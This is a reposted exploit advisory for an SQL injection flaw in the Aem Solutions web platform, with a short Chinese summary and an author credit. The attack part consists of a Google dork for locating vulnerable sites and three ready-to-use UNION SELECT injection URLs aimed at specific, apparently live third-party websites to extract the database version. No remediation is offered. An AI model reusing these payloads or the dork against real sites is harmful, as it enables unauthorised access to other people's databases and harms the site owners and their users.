文章揭示了Aem Solutions平台中的SQL注入漏洞,并提供了三个PoC链接以示例说明。该漏洞允许攻击者通过构造特定URL获取数据库版本信息,影响多个网站的安全性。 2025-5-8 19:16:9 Author: cxsecurity.com(查看原文) 阅读量:4 收藏
Aem Solutions - Sql Injection
********************************************************* #Exploit Title: Aem Solutions - Sql Injection #Date: 2025-05-07 #Exploit Author: Behrouz Mansoori #Google Dork: "Powered By Aem Solutions" #Category:webapps #Tested On: Mac, Firefox Proof of Concept: ### Demo : https://www.aaar.co.in/page.php?id=-3%27%20union%20select%201,2,3,version(),5--+ https://csalok.com/page.php?id=2%27%20union%20select%201,2,3,version(),5--+ https://www.pnaindia.in/page.php?id=6%27%20union%20select%201,2,3,version(),5--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh